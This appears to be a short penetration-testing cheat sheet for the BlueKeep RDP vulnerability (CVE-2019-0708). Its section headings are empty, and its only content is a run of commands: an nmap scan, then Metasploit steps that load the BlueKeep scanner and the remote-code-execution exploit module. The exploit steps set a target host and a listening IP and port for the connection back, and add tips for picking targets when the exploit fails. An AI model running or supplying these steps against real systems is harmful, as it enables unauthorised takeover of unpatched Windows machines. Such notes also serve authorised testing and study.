CVE-2019-0708: BlueKeep
Why the Vulnerability Occurs
Exploitation
MSF
Others
Last updated
Last updated
# enumeration with nmap
sudo nmap -Pn -sV -O [IP]
# vulnerability scan
msfconsole -q
search bluekeep
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
set RHOSTS [IP]
run
# exploitation (only works in x64)
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set RHOSTS [IP]
set LHOST [Listening IP]
set LPORT [Listening Port]
# Exploit may fail for Bad Config. Manually configure targets.
show targets
select target [target name]
run